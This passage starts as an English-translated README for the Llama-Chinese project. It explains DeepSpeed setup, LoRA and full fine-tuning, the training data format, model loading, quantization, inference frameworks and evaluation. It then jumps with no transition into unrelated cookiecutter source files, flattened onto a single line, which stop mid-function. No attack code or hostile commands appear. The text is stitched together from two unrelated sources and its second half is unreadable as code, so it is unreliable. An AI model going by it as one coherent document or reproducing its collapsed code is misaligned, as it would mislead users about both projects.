- [DeepSpeed](https://github.com/microsoft/DeepSpeed) acceleration:
    - For single-GPU training, use ZeRO-2; see the configuration in [train/pretrain/ds_config_zero2.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero2.json)
    - For multi-GPU training, use ZeRO-3; see the configuration in [train/pretrain/ds_config_zero3.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero3.json)
- Training metric: [train/pretrain/accuracy.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/accuracy.py)

## 💡 Model Fine-tuning

This repository provides both LoRA fine-tuning and full-parameter fine-tuning code. For a detailed introduction to LoRA, see the paper "[LoRA: Low-Rank Adaptation of Large Language Models](https://arxiv.org/abs/2106.09685)" and Microsoft's GitHub repository [LoRA](https://github.com/microsoft/LoRA).

### Step1: Environment setup

Install the dependencies listed in [requirements.txt](https://github.com/LlamaFamily/Llama-Chinese/blob/main/requirements.txt).

### Step2: Data preparation

A sample SFT dataset is provided in the data directory:
- Training data: [data/train_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/train_sft.csv)
- Validation data: [data/dev_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/dev_sft.csv)

Each csv file contains a single column named "text", with one training example per row. Each example combines a question and an answer into the model input using the format below; you can build your own training and validation sets in the same format:
```
"<s>Human: " + question + "\n</s><s>Assistant: " + answer + "\n</s>"
```
For example,
```
<s>Human: 用一句话描述地球为什么是独一无二的。</s><s>Assistant: 因为地球是目前为止唯一已知存在生命的行星。</s>
```
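To make the format above concrete, here is a minimal sketch (not part of the repository) that writes a couple of question/answer pairs into a `train_sft.csv`-style file with a single "text" column. The example pairs, the output file name and the use of the standard `csv` module are illustrative assumptions; only the template string itself is taken from the documentation above.

```python
# Minimal sketch: build an SFT csv in the "<s>Human: ...</s><s>Assistant: ...</s>" format described above.
import csv

# Illustrative pairs; replace with your own data.
pairs = [
    ("用一句话描述地球为什么是独一无二的。", "因为地球是目前为止唯一已知存在生命的行星。"),
    ("列出5种可以改善睡眠质量的方法", "规律作息、适度运动、减少咖啡因、睡前远离屏幕、保持卧室安静黑暗。"),
]


def to_sample(question: str, answer: str) -> str:
    # Mirrors the documented template: "<s>Human: " + question + "\n</s><s>Assistant: " + answer + "\n</s>"
    return "<s>Human: " + question + "\n</s><s>Assistant: " + answer + "\n</s>"


with open("my_train_sft.csv", "w", newline="", encoding="utf-8") as f:
    writer = csv.writer(f)
    writer.writerow(["text"])  # single "text" column, as described above
    writer.writerows([to_sample(q, a)] for q, a in pairs)
```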
### Step3: Fine-tuning scripts

#### LoRA fine-tuning

The LoRA fine-tuning script is [train/sft/finetune_lora.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_lora.sh); the implementation is in [train/sft/finetune_clm_lora.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm_lora.py). Single-node multi-GPU fine-tuning can be enabled by modifying `--include localhost:0` in the script.

#### Full-parameter fine-tuning

The full-parameter fine-tuning script is [train/sft/finetune.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune.sh); the implementation is in [train/sft/finetune_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm.py).

### Step4: Loading the fine-tuned model

#### LoRA fine-tuning

The LoRA fine-tuned model parameters are listed under [Chinese fine-tuned models based on Llama2](#llama2中文微调模型); the LoRA parameters must be combined with the base model parameters.

Use [PEFT](https://github.com/huggingface/peft) to load the pre-trained model parameters together with the fine-tuned parameters. In the example code below, base_model_name_or_path is the path where the pre-trained model is stored, and finetune_model_path is the path where the fine-tuned parameters are stored.

```python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from peft import PeftModel, PeftConfig

# e.g. finetune_model_path='FlagAlpha/Llama2-Chinese-7b-Chat-LoRA'
finetune_model_path = ''
config = PeftConfig.from_pretrained(finetune_model_path)
# e.g. base_model_name_or_path='meta-llama/Llama-2-7b-chat'
tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path, use_fast=False)
tokenizer.pad_token = tokenizer.eos_token
device_map = "cuda:0" if torch.cuda.is_available() else "auto"
model = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path, device_map=device_map, torch_dtype=torch.float16, load_in_8bit=True, trust_remote_code=True, use_flash_attention_2=True)
model = PeftModel.from_pretrained(model, finetune_model_path, device_map={"": 0})
model = model.eval()
input_ids = tokenizer(['<s>Human: 介绍一下北京\n</s><s>Assistant: '], return_tensors="pt", add_special_tokens=False).input_ids
if torch.cuda.is_available():
    input_ids = input_ids.to('cuda')
generate_input = {
    "input_ids": input_ids,
    "max_new_tokens": 512,
    "do_sample": True,
    "top_k": 50,
    "top_p": 0.95,
    "temperature": 0.3,
    "repetition_penalty": 1.3,
    "eos_token_id": tokenizer.eos_token_id,
    "bos_token_id": tokenizer.bos_token_id,
    "pad_token_id": tokenizer.pad_token_id
}
generate_ids = model.generate(**generate_input)
text = tokenizer.decode(generate_ids[0])
print(text)
```

#### Full-parameter fine-tuning

For a fully fine-tuned model, usage is the same as in the [model invocation example](#模型调用代码示例); simply change the model name or checkpoint path.

## 🍄 Model Quantization

We quantized the parameters of the Chinese fine-tuned models so they can run with fewer compute resources. A 4-bit compressed version, [FlagAlpha/Llama2-Chinese-13b-Chat-4bit](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat-4bit), of the 13B Chinese fine-tuned model [FlagAlpha/Llama2-Chinese-13b-Chat](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat) is already available on [Hugging Face](https://huggingface.co/FlagAlpha). It can be used as follows:

Environment setup:
```
pip install git+https://github.com/PanQiWei/AutoGPTQ.git
```

```python
from transformers import AutoTokenizer
from auto_gptq import AutoGPTQForCausalLM

model = AutoGPTQForCausalLM.from_quantized('FlagAlpha/Llama2-Chinese-13b-Chat-4bit', device="cuda:0")
tokenizer = AutoTokenizer.from_pretrained('FlagAlpha/Llama2-Chinese-13b-Chat-4bit', use_fast=False)
input_ids = tokenizer(['<s>Human: 怎么登上火星\n</s><s>Assistant: '], return_tensors="pt", add_special_tokens=False).input_ids.to('cuda')
generate_input = {
    "input_ids": input_ids,
    "max_new_tokens": 512,
    "do_sample": True,
    "top_k": 50,
    "top_p": 0.95,
    "temperature": 0.3,
    "repetition_penalty": 1.3,
    "eos_token_id": tokenizer.eos_token_id,
    "bos_token_id": tokenizer.bos_token_id,
    "pad_token_id": tokenizer.pad_token_id
}
generate_ids = model.generate(**generate_input)
text = tokenizer.decode(generate_ids[0])
print(text)
```

## 🚀 Deployment Acceleration

As model sizes keep growing, improving inference speed under limited compute has become an important research direction. Commonly used inference acceleration frameworks include lmdeploy, TensorRT-LLM, vLLM and JittorLLMs.

### TensorRT-LLM

[TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM/tree/main) is a high-performance inference framework developed by NVIDIA.
Detailed inference documentation: [inference-speed/GPU/TensorRT-LLM_example](https://github.com/LlamaFamily/Llama-Chinese/tree/main/inference-speed/GPU/TensorRT-LLM_example)

### vLLM

[vLLM](https://github.com/vllm-project/vllm) was developed at UC Berkeley; its core technique is PagedAttention, and it achieves up to 24x higher throughput than HuggingFace Transformers. Compared with FasterTransformer, vLLM is simpler to use: it requires no extra model conversion and supports fp16 inference.
Detailed inference documentation: [inference-speed/GPU/vllm_example](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/GPU/vllm_example/README.md)

### JittorLLMs

[JittorLLMs](https://github.com/Jittor/JittorLLMs) is led by 非十科技 in collaboration with the Visual Media Research Center at Tsinghua University. Its dynamic swap mechanism dramatically lowers hardware requirements (by 80%), the Jittor framework's zero-copy technique cuts model-loading overhead by 40% compared with PyTorch, and meta-operator auto-compilation improves compute performance by more than 20%.
Detailed inference documentation: [inference-speed/GPU/JittorLLMs](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/GPU/JittorLLMs_example/README.md)

### lmdeploy

[lmdeploy](https://github.com/InternLM/lmdeploy/) is developed by the Shanghai AI Laboratory. Inference is implemented in C++/CUDA, exposed through python/gRPC/http interfaces and a WebUI, and it supports tensor-parallel distributed inference as well as fp16, weight int4 and kv cache int8 quantization.
Detailed inference documentation: [inference-speed/GPU/lmdeploy_example](https://github.com/LlamaFamily/Llama-Chinese/tree/main/inference-speed/GPU/lmdeploy_example)
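As a concrete starting point for the frameworks listed above, here is a minimal vLLM sketch for offline batch inference. It is an illustrative example rather than the repository's own script (the repository's reference usage is in the vllm_example linked above); the model name, prompt template and sampling parameters are assumptions borrowed from the earlier examples in this README, and a CUDA GPU plus `pip install vllm` are assumed.

```python
# Minimal sketch: offline inference with vLLM, reusing the prompt template from the examples above.
from vllm import LLM, SamplingParams

# Load the model directly from the Hugging Face hub; no separate conversion step is needed.
llm = LLM(model="FlagAlpha/Atom-7B-Chat", dtype="float16", trust_remote_code=True)
sampling_params = SamplingParams(temperature=0.3, top_p=0.95, max_tokens=512)

prompts = ["<s>Human: 介绍一下北京\n</s><s>Assistant: "]  # same template as the transformers examples above
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
    print(output.outputs[0].text)
```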
## 💪 Extended Capabilities

Beyond continually strengthening the model's internal knowledge, general understanding, logical reasoning and imagination, we will also keep extending its external capabilities, such as knowledge-base retrieval, calculation tools, WolframAlpha, and operating software.

As a first step we integrated the LangChain framework, which makes it easier to build document retrieval, QA bots and agent applications on top of Llama2. For more about LangChain, see [LangChain](https://github.com/langchain-ai/langchain).

### LangChain

The Llama2 LLM class wrapped for the LangChain framework is in [examples/llama2_for_langchain.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/examples/llama2_for_langchain.py). A simple usage example:

```python
from llama2_for_langchain import Llama2

# Using FlagAlpha/Atom-7B-Chat as an example
llm = Llama2(model_name_or_path='FlagAlpha/Atom-7B-Chat')

while True:
    human_input = input("Human: ")
    response = llm(human_input)
    print(f"Llama2: {response}")
```

## 🥇 Model Evaluation

### Llama2 vs. Llama3

Base model comparison
<p align="center" width="100%">
<img src="./assets/base_eval.png" style="width: 100%; display: block; margin: auto;">
</p>

Fine-tuned model comparison
<p align="center" width="100%">
<img src="./assets/tuned_eval.png" style="width: 100%; display: block; margin: auto;">
</p>

### Llama3 evaluation
<p align="center" width="100%">
<img src="./assets/llama3_eval.png" style="width: 100%; display: block; margin: auto;">
</p>

### Llama2 evaluation
<p align="center" width="100%">
<img src="./assets/llama_eval.jpeg" style="width: 100%; display: block; margin: auto;">
</p>

To get a clearer picture of Llama2's Chinese question-answering ability, we selected a set of representative Chinese questions and put them to the Llama2 models. The tested models are Meta's public Llama2-7B-Chat and Llama2-13B-Chat, without any fine-tuning or additional training. The 95 test questions were selected from [AtomBulb](https://github.com/AtomEcho/AtomBulb) and cover eight broad categories: general knowledge, language understanding, creative writing, logical reasoning, programming, work skills, tool use, and personality.

The prompt used in the tests is shown below, here for the question "列出5种可以改善睡眠质量的方法" (list five ways to improve sleep quality):
```
[INST]
<<SYS>>
You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. The answer always been translate into Chinese language.

If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information. The answer always been translate into Chinese language.
<</SYS>>

列出5种可以改善睡眠质量的方法
[/INST]
```

The results for Llama2-7B-Chat are in [meta_eval_7B.md](assets/meta_eval_7B.md), and the results for Llama2-13B-Chat are in [meta_eval_13B.md](assets/meta_eval_13B.md).

The tests show that Meta's original Llama2 Chat models are only weakly aligned for Chinese question answering: in most cases they cannot answer in Chinese, or they mix Chinese and English. Training and fine-tuning Llama2 on Chinese data is therefore essential.

## 📖 Learning Center

### Official documentation

Official documentation for the whole Meta Llama model family: https://llama.meta.com/docs/get-started

### Llama3

[Complete Llama3 learning materials](https://chinesellama.feishu.cn/wiki/XBKPwbhWriWCfrkmJhfcrS9Rnqc?fromScene=spaceOverview)

Official Llama3 link: https://llama.meta.com/llama3

### Llama2

#### Meta's official introduction to [Llama2](https://ai.meta.com/llama)

Since Meta released the first-generation LLaMA model, the "alpaca" family of models has flourished. Meta's more recent Llama2 release is open source and commercially usable, with major updates to both the models and their quality. Llama2 is available in three sizes: 7B, 13B and 70B parameters. Compared with LLaMA, Llama2 was trained on 2 trillion tokens, and the context length was extended from 2048 to 4096, so it can understand and generate longer text. The Llama2 Chat models were fine-tuned on one million human-labeled examples and approach ChatGPT-level quality for English conversation.

### Llama papers

* [LLaMA: Open and Efficient Foundation Language Models](https://arxiv.org/abs/2302.13971)
* [Llama 2: Open Foundation and Fine-Tuned Chat Models](https://arxiv.org/abs/2307.09288)
* [Code Llama: Open Foundation Models for Code](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/)

## 📌 Miscellaneous

### 🎉 Acknowledgements

Thanks to the [AtomEcho](https://github.com/AtomEcho) (原子回声) team for their technical and resource support!
Thanks to the [Coremesh](https://coremesh.net) (芯格) team for their technical and resource support!
Thanks to [福州连天教育科技有限公司](www.3class.cc) for its contributions to the Llama Chinese community!
Thanks to the @Z Potentials community for supporting the Llama Chinese community!

### 🤔 Feedback

If you run into problems, please file a GitHub Issue; before opening one, check whether an existing issue already answers your question.
Please ask questions politely and help keep the discussion community friendly.
Join the [Feishu knowledge base](https://chinesellama.feishu.cn/wiki/space/7257824476874768388?ccm_open_type=lark_wiki_spaceLink) to help build the community documentation together.
Join the WeChat group discussion 😍😍

<p align="center" width="100%">
<img src="./assets/wechat-new.jpeg" alt="Wechat" style="width: 100%; display: block; margin: auto;">
</p>

<p align="center" width="100%">
<img src="https://api.star-history.com/svg?repos=LlamaFamily/Llama-Chinese&type=Date" alt="Star" style="width: 100%; display: block; margin: auto;">
</p>
cookiecutter
b4451231809fb9e4fc2a1e95d433cb030e4b9e06
File: setup.py """cookiecutter distutils configuration.""" from pathlib import Path from setuptools import setup def _get_version() -> str: """Read cookiecutter/VERSION.txt and return its contents.""" path = Path("cookiecutter").resolve() version_file = path / "VERSION.txt" return version_file.read_text().strip() version = _get_version() readme = Path('README.md').read_text(encoding='utf-8') requirements = [ 'binaryornot>=0.4.4', 'Jinja2>=2.7,<4.0.0', 'click>=7.0,<9.0.0', 'pyyaml>=5.3.1', 'python-slugify>=4.0.0', 'requests>=2.23.0', 'arrow', 'rich', ] setup( name='cookiecutter', version=version, description=( 'A command-line utility that creates projects from project ' 'templates, e.g. creating a Python package project from a ' 'Python package project template.' ), long_description=readme, long_description_content_type='text/markdown', author='Audrey Feldroy', author_email='[email protected]', url='https://github.com/cookiecutter/cookiecutter', project_urls={ "Documentation": "https://cookiecutter.readthedocs.io", "Issues": "https://github.com/cookiecutter/cookiecutter/issues", "Discord": "https://discord.gg/9BrxzPKuEW", }, packages=['cookiecutter'], package_dir={'cookiecutter': 'cookiecutter'}, entry_points={'console_scripts': ['cookiecutter = cookiecutter.__main__:main']}, include_package_data=True, python_requires='>=3.8', install_requires=requirements, license='BSD', zip_safe=False, classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Natural Language :: English", "License :: OSI Approved :: BSD License", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Programming Language :: Python", "Topic :: Software Development", ], keywords=[ "cookiecutter", "Python", "projects", "project templates", "Jinja2", "skeleton", "scaffolding", "project directory", "package", "packaging", ], ) File: __main__.py """Allow cookiecutter to be executable from a checkout or zip file.""" import runpy if __name__ == "__main__": runpy.run_module("cookiecutter", run_name="__main__") File: cookiecutter/zipfile.py """Utility functions for handling and fetching repo archives in zip format.""" from __future__ import annotations import os import tempfile from pathlib import Path from zipfile import BadZipFile, ZipFile import requests from cookiecutter.exceptions import InvalidZipRepository from cookiecutter.prompt import prompt_and_delete, read_repo_password from cookiecutter.utils import make_sure_path_exists def unzip( zip_uri: str, is_url: bool, clone_to_dir: Path | str = ".", no_input: bool = False, password: str | None = None, ) -> str: """Download and unpack a zipfile at a given URI. This will download the zipfile to the cookiecutter repository, and unpack into a temporary directory. :param zip_uri: The URI for the zipfile. :param is_url: Is the zip URI a URL or a file? :param clone_to_dir: The cookiecutter repository directory to put the archive into. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :param password: The password to use when unpacking the repository. 
""" # Ensure that clone_to_dir exists clone_to_dir = Path(clone_to_dir).expanduser() make_sure_path_exists(clone_to_dir) if is_url: # Build the name of the cached zipfile, # and prompt to delete if it already exists. identifier = zip_uri.rsplit('/', 1)[1] zip_path = os.path.join(clone_to_dir, identifier) if os.path.exists(zip_path): download = prompt_and_delete(zip_path, no_input=no_input) else: download = True if download: # (Re) download the zipfile r = requests.get(zip_uri, stream=True, timeout=100) with open(zip_path, 'wb') as f: for chunk in r.iter_content(chunk_size=1024): if chunk: # filter out keep-alive new chunks f.write(chunk) else: # Just use the local zipfile as-is. zip_path = os.path.abspath(zip_uri) # Now unpack the repository. The zipfile will be unpacked # into a temporary directory try: zip_file = ZipFile(zip_path) if len(zip_file.namelist()) == 0: msg = f'Zip repository {zip_uri} is empty' raise InvalidZipRepository(msg) # The first record in the zipfile should be the directory entry for # the archive. If it isn't a directory, there's a problem. first_filename = zip_file.namelist()[0] if not first_filename.endswith('/'): msg = f"Zip repository {zip_uri} does not include a top-level directory" raise InvalidZipRepository(msg) # Construct the final target directory project_name = first_filename[:-1] unzip_base = tempfile.mkdtemp() unzip_path = os.path.join(unzip_base, project_name) # Extract the zip file into the temporary directory try: zip_file.extractall(path=unzip_base) except RuntimeError as runtime_err: # File is password protected; try to get a password from the # environment; if that doesn't work, ask the user. if password is not None: try: zip_file.extractall(path=unzip_base, pwd=password.encode('utf-8')) except RuntimeError as e: msg = 'Invalid password provided for protected repository' raise InvalidZipRepository(msg) from e elif no_input: msg = 'Unable to unlock password protected repository' raise InvalidZipRepository(msg) from runtime_err else: retry: int | None = 0 while retry is not None: try: password = read_repo_password('Repo password') zip_file.extractall( path=unzip_base, pwd=password.encode('utf-8') ) retry = None except RuntimeError as e: # noqa: PERF203 retry += 1 # type: ignore[operator] if retry == 3: msg = 'Invalid password provided for protected repository' raise InvalidZipRepository(msg) from e except BadZipFile as e: msg = f'Zip repository {zip_uri} is not a valid zip archive:' raise InvalidZipRepository(msg) from e return unzip_path File: cookiecutter/hooks.py """Functions for discovering and executing various cookiecutter hooks.""" from __future__ import annotations import errno import logging import os import subprocess import sys import tempfile from pathlib import Path from typing import Any from jinja2.exceptions import UndefinedError from cookiecutter import utils from cookiecutter.exceptions import FailedHookException from cookiecutter.utils import ( create_env_with_context, create_tmp_repo_dir, rmtree, work_in, ) logger = logging.getLogger(__name__) _HOOKS = [ 'pre_prompt', 'pre_gen_project', 'post_gen_project', ] EXIT_SUCCESS = 0 def valid_hook(hook_file: str, hook_name: str) -> bool: """Determine if a hook file is valid. 
:param hook_file: The hook file to consider for validity :param hook_name: The hook to find :return: The hook file validity """ filename = os.path.basename(hook_file) basename = os.path.splitext(filename)[0] matching_hook = basename == hook_name supported_hook = basename in _HOOKS backup_file = filename.endswith('~') return matching_hook and supported_hook and not backup_file def find_hook(hook_name: str, hooks_dir: str = 'hooks') -> list[str] | None: """Return a dict of all hook scripts provided. Must be called with the project template as the current working directory. Dict's key will be the hook/script's name, without extension, while values will be the absolute path to the script. Missing scripts will not be included in the returned dict. :param hook_name: The hook to find :param hooks_dir: The hook directory in the template :return: The absolute path to the hook script or None """ logger.debug('hooks_dir is %s', os.path.abspath(hooks_dir)) if not os.path.isdir(hooks_dir): logger.debug('No hooks/dir in template_dir') return None scripts = [ os.path.abspath(os.path.join(hooks_dir, hook_file)) for hook_file in os.listdir(hooks_dir) if valid_hook(hook_file, hook_name) ] if len(scripts) == 0: return None return scripts def run_script(script_path: str, cwd: Path | str = '.') -> None: """Execute a script from a working directory. :param script_path: Absolute path to the script to run. :param cwd: The directory to run the script from. """ run_thru_shell = sys.platform.startswith('win') if script_path.endswith('.py'): script_command = [sys.executable, script_path] else: script_command = [script_path] utils.make_executable(script_path) try: proc = subprocess.Popen(script_command, shell=run_thru_shell, cwd=cwd) # nosec exit_status = proc.wait() if exit_status != EXIT_SUCCESS: msg = f'Hook script failed (exit status: {exit_status})' raise FailedHookException(msg) except OSError as err: if err.errno == errno.ENOEXEC: msg = 'Hook script failed, might be an empty file or missing a shebang' raise FailedHookException(msg) from err msg = f'Hook script failed (error: {err})' raise FailedHookException(msg) from err def run_script_with_context( script_path: Path | str, cwd: Path | str, context: dict[str, Any] ) -> None: """Execute a script after rendering it with Jinja. :param script_path: Absolute path to the script to run. :param cwd: The directory to run the script from. :param context: Cookiecutter project template context. """ _, extension = os.path.splitext(script_path) contents = Path(script_path).read_text(encoding='utf-8') with tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=extension) as temp: env = create_env_with_context(context) template = env.from_string(contents) output = template.render(**context) temp.write(output.encode('utf-8')) run_script(temp.name, cwd) def run_hook(hook_name: str, project_dir: Path | str, context: dict[str, Any]) -> None: """ Try to find and execute a hook from the specified project directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. 
""" scripts = find_hook(hook_name) if not scripts: logger.debug('No %s hook found', hook_name) return logger.debug('Running hook %s', hook_name) for script in scripts: run_script_with_context(script, project_dir, context) def run_hook_from_repo_dir( repo_dir: Path | str, hook_name: str, project_dir: Path | str, context: dict[str, Any], delete_project_on_failure: bool, ) -> None: """Run hook from repo directory, clean project directory if hook fails. :param repo_dir: Project template input directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. :param delete_project_on_failure: Delete the project directory on hook failure? """ with work_in(repo_dir): try: run_hook(hook_name, project_dir, context) except ( FailedHookException, UndefinedError, ): if delete_project_on_failure: rmtree(project_dir) logger.exception( "Stopping generation because %s hook " "script didn't exit successfully", hook_name, ) raise def run_pre_prompt_hook(repo_dir: Path | str) -> Path | str: """Run pre_prompt hook from repo directory. :param repo_dir: Project template input directory. """ # Check if we have a valid pre_prompt script with work_in(repo_dir): scripts = find_hook('pre_prompt') if not scripts: return repo_dir # Create a temporary directory repo_dir = create_tmp_repo_dir(repo_dir) with work_in(repo_dir): scripts = find_hook('pre_prompt') or [] for script in scripts: try: run_script(script, str(repo_dir)) except FailedHookException as e: # noqa: PERF203 msg = 'Pre-Prompt Hook script failed' raise FailedHookException(msg) from e return repo_dir File: cookiecutter/config.py """Global configuration handling.""" from __future__ import annotations import collections import copy import logging import os from typing import TYPE_CHECKING, Any import yaml from cookiecutter.exceptions import ConfigDoesNotExistException, InvalidConfiguration if TYPE_CHECKING: from pathlib import Path logger = logging.getLogger(__name__) USER_CONFIG_PATH = os.path.expanduser('~/.cookiecutterrc') BUILTIN_ABBREVIATIONS = { 'gh': 'https://github.com/{0}.git', 'gl': 'https://gitlab.com/{0}.git', 'bb': 'https://bitbucket.org/{0}', } DEFAULT_CONFIG = { 'cookiecutters_dir': os.path.expanduser('~/.cookiecutters/'), 'replay_dir': os.path.expanduser('~/.cookiecutter_replay/'), 'default_context': collections.OrderedDict([]), 'abbreviations': BUILTIN_ABBREVIATIONS, } def _expand_path(path: str) -> str: """Expand both environment variables and user home in the given path.""" path = os.path.expandvars(path) return os.path.expanduser(path) def merge_configs(default: dict[str, Any], overwrite: dict[str, Any]) -> dict[str, Any]: """Recursively update a dict with the key/value pair of another. Dict values that are dictionaries themselves will be updated, whilst preserving existing keys. """ new_config = copy.deepcopy(default) for k, v in overwrite.items(): # Make sure to preserve existing items in # nested dicts, for example `abbreviations` if isinstance(v, dict): new_config[k] = merge_configs(default.get(k, {}), v) else: new_config[k] = v return new_config def get_config(config_path: Path | str) -> dict[str, Any]: """Retrieve the config from the specified path, returning a config dict.""" if not os.path.exists(config_path): msg = f'Config file {config_path} does not exist.' 
raise ConfigDoesNotExistException(msg) logger.debug('config_path is %s', config_path) with open(config_path, encoding='utf-8') as file_handle: try: yaml_dict = yaml.safe_load(file_handle) or {} except yaml.YAMLError as e: msg = f'Unable to parse YAML file {config_path}.' raise InvalidConfiguration(msg) from e if not isinstance(yaml_dict, dict): msg = f'Top-level element of YAML file {config_path} should be an object.' raise InvalidConfiguration(msg) config_dict = merge_configs(DEFAULT_CONFIG, yaml_dict) raw_replay_dir = config_dict['replay_dir'] config_dict['replay_dir'] = _expand_path(raw_replay_dir) raw_cookies_dir = config_dict['cookiecutters_dir'] config_dict['cookiecutters_dir'] = _expand_path(raw_cookies_dir) return config_dict def get_user_config( config_file: str | None = None, default_config: bool | dict[str, Any] = False, ) -> dict[str, Any]: """Return the user config as a dict. If ``default_config`` is True, ignore ``config_file`` and return default values for the config parameters. If ``default_config`` is a dict, merge values with default values and return them for the config parameters. If a path to a ``config_file`` is given, that is different from the default location, load the user config from that. Otherwise look up the config file path in the ``COOKIECUTTER_CONFIG`` environment variable. If set, load the config from this path. This will raise an error if the specified path is not valid. If the environment variable is not set, try the default config file path before falling back to the default config values. """ # Do NOT load a config. Merge provided values with defaults and return them instead if default_config and isinstance(default_config, dict): return merge_configs(DEFAULT_CONFIG, default_config) # Do NOT load a config. Return defaults instead. if default_config: logger.debug("Force ignoring user config with default_config switch.") return copy.copy(DEFAULT_CONFIG) # Load the given config file if config_file and config_file is not USER_CONFIG_PATH: logger.debug("Loading custom config from %s.", config_file) return get_config(config_file) try: # Does the user set up a config environment variable? env_config_file = os.environ['COOKIECUTTER_CONFIG'] except KeyError: # Load an optional user config if it exists # otherwise return the defaults if os.path.exists(USER_CONFIG_PATH): logger.debug("Loading config from %s.", USER_CONFIG_PATH) return get_config(USER_CONFIG_PATH) logger.debug("User config not found. Loading default config.") return copy.copy(DEFAULT_CONFIG) else: # There is a config environment variable. Try to load it. # Do not check for existence, so invalid file paths raise an error. logger.debug("User config not found or not specified. Loading default config.") return get_config(env_config_file) File: cookiecutter/log.py """Module for setting up logging.""" from __future__ import annotations import logging import sys LOG_LEVELS = { 'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR, 'CRITICAL': logging.CRITICAL, } LOG_FORMATS = { 'DEBUG': '%(levelname)s %(name)s: %(message)s', 'INFO': '%(levelname)s: %(message)s', } def configure_logger( stream_level: str = 'DEBUG', debug_file: str | None = None ) -> logging.Logger: """Configure logging for cookiecutter. Set up logging to stdout with given level. If ``debug_file`` is given set up logging to file with DEBUG level. 
""" # Set up 'cookiecutter' logger logger = logging.getLogger('cookiecutter') logger.setLevel(logging.DEBUG) # Remove all attached handlers, in case there was # a logger with using the name 'cookiecutter' del logger.handlers[:] # Create a file handler if a log file is provided if debug_file is not None: debug_formatter = logging.Formatter(LOG_FORMATS['DEBUG']) file_handler = logging.FileHandler(debug_file) file_handler.setLevel(LOG_LEVELS['DEBUG']) file_handler.setFormatter(debug_formatter) logger.addHandler(file_handler) # Get settings based on the given stream_level log_formatter = logging.Formatter(LOG_FORMATS[stream_level]) log_level = LOG_LEVELS[stream_level] # Create a stream handler stream_handler = logging.StreamHandler(stream=sys.stdout) stream_handler.setLevel(log_level) stream_handler.setFormatter(log_formatter) logger.addHandler(stream_handler) return logger File: cookiecutter/generate.py """Functions for generating a project from a project template.""" from __future__ import annotations import fnmatch import json import logging import os import shutil import warnings from collections import OrderedDict from pathlib import Path from typing import Any from binaryornot.check import is_binary from jinja2 import Environment, FileSystemLoader from jinja2.exceptions import TemplateSyntaxError, UndefinedError from rich.prompt import InvalidResponse from cookiecutter.exceptions import ( ContextDecodingException, EmptyDirNameException, OutputDirExistsException, UndefinedVariableInTemplate, ) from cookiecutter.find import find_template from cookiecutter.hooks import run_hook_from_repo_dir from cookiecutter.prompt import YesNoPrompt from cookiecutter.utils import ( create_env_with_context, make_sure_path_exists, rmtree, work_in, ) logger = logging.getLogger(__name__) def is_copy_only_path(path: str, context: dict[str, Any]) -> bool: """Check whether the given `path` should only be copied and not rendered. Returns True if `path` matches a pattern in the given `context` dict, otherwise False. :param path: A file-system path referring to a file or dir that should be rendered or just copied. :param context: cookiecutter context. 
""" try: for dont_render in context['cookiecutter']['_copy_without_render']: if fnmatch.fnmatch(path, dont_render): return True except KeyError: return False return False def apply_overwrites_to_context( context: dict[str, Any], overwrite_context: dict[str, Any], *, in_dictionary_variable: bool = False, ) -> None: """Modify the given context in place based on the overwrite_context.""" for variable, overwrite in overwrite_context.items(): if variable not in context: if not in_dictionary_variable: # We are dealing with a new variable on first level, ignore continue # We are dealing with a new dictionary variable in a deeper level context[variable] = overwrite context_value = context[variable] if isinstance(context_value, list): if in_dictionary_variable: context[variable] = overwrite continue if isinstance(overwrite, list): # We are dealing with a multichoice variable # Let's confirm all choices are valid for the given context if set(overwrite).issubset(set(context_value)): context[variable] = overwrite else: msg = ( f"{overwrite} provided for multi-choice variable " f"{variable}, but valid choices are {context_value}" ) raise ValueError(msg) else: # We are dealing with a choice variable if overwrite in context_value: # This overwrite is actually valid for the given context # Let's set it as default (by definition first item in list) # see ``cookiecutter.prompt.prompt_choice_for_config`` context_value.remove(overwrite) context_value.insert(0, overwrite) else: msg = ( f"{overwrite} provided for choice variable " f"{variable}, but the choices are {context_value}." ) raise ValueError(msg) elif isinstance(context_value, dict) and isinstance(overwrite, dict): # Partially overwrite some keys in original dict apply_overwrites_to_context( context_value, overwrite, in_dictionary_variable=True ) context[variable] = context_value elif 